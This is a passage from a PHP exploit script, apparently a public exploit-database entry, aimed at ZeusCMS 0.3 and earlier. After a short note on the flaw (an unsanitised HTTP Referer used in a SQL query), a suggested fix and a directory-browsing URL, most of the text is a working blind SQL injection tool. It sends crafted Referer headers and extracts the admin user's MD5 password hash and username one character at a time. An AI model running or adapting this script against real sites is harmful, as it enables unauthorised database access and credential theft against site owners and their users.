query("SELECT * FROM $table WHERE url like '%$ref%' AND status='BLOCKED'"); <== 136. if($res->numRows()>0){ 137. return true; 138. } 139. else{ 140. return false; 141. } 142. }else{ 143. return false; 144. } an attacker can inject sql code through http referer header, that isn't properly checked... [*] Possible bug fix in /index.php : 128. $ref = security::safeGet($_SERVER["HTTP_REFERER"]); 129. $blockedRefCheck = security::checkRef($ref); [-] there is also a possible file system browsing through /image_viewer.php, p.o.c. : http://[host]/[path]/image_viewer.php?dir=/ */ error_reporting(0); ini_set("default_socket_timeout", 5); set_time_limit(0); function http_send($host, $packet) { $sock = fsockopen($host, 80); while (!$sock) { print "\n[-] No response from {$host}:80 Trying again..."; $sock = fsockopen($host, 80); sleep(1); } fputs($sock, $packet); $resp = ""; while (!feof($sock)) $resp .= fread($sock, 1); fclose($sock); return $resp; } function check_query($sql) { global $host, $path; $packet = "GET {$path} HTTP/1.1\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Referer: {$sql} \r\n"; $packet.= "Keep-Alive: 300\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $html = http_send($host, $packet); return (preg_match("/DENIED/", $html) ? true : false); } print "\n+-----------------------------------------------------------+"; print "\n| ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit by EgiX |"; print "\n+-----------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] host path [prefix] [userid]\n"; print "\nhost.......: target server (ip/hostname)"; print "\npath.......: path to ZeusCMS directory (example: / or /zeuscms/)"; print "\nprefix.....: table's prefix (default: ze)"; print "\nuserid.....: user id (default: 1 - admin)\n"; die(); } $host = $argv[1]; $path = $argv[2]; $pre = (isset($argv[3]) ? $argv[3] : "ze"); $uid = (isset($argv[4]) ? $argv[4] : "1"); $hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $index = 1; $md5 = ""; print "\n[-] MD5 Hash: "; while (!strpos($md5, chr(0))) { for ($i = 0; $i <= count($hash); $i++) { if ($i == count($hash)) die("\n[-] Exploit failed...\n"); $sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/pwd,1,1,1/**/FROM/**/{$pre}_users/**/" . "WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(pwd,{$index},1))={$hash[$i]}/*"; if (check_query($sql)) { $md5 .= chr($hash[$i]); print chr($hash[$i]); break; } } $index++; } $char = array(0); // null char for ($j = 97; $j <= 122; $j++) $char = array_merge($char, array($j)); // a-z for ($j = 65; $j <= 90; $j++) $char = array_merge($char, array($j)); // A-Z for ($j = 48; $j <= 57; $j++) $char = array_merge($char, array($j)); // 0-9 $index = 1; $user = ""; print "\n[-] Username: "; while (!strpos($user, chr(0))) { for ($i = 0; $i <= count($char); $i++) { if ($i == count($char)) die("\n[-] Exploit failed...\n"); $sql = "%'/**/AND/**/id=-1/**/UNION/**/SELECT/**/nickname,1,1,1/**/FROM/**/{$pre}_users/**/" . "WHERE/**/id={$uid}/**/AND/**/ORD(SUBSTR(nickname,{$index},1))={$char[$i]}/*"; if (check_query($sql)) { $user .= chr($char[$i]); print chr($char[$i]); break; } } $index++; } print "\n\n[-] Successfull!\n"; ?>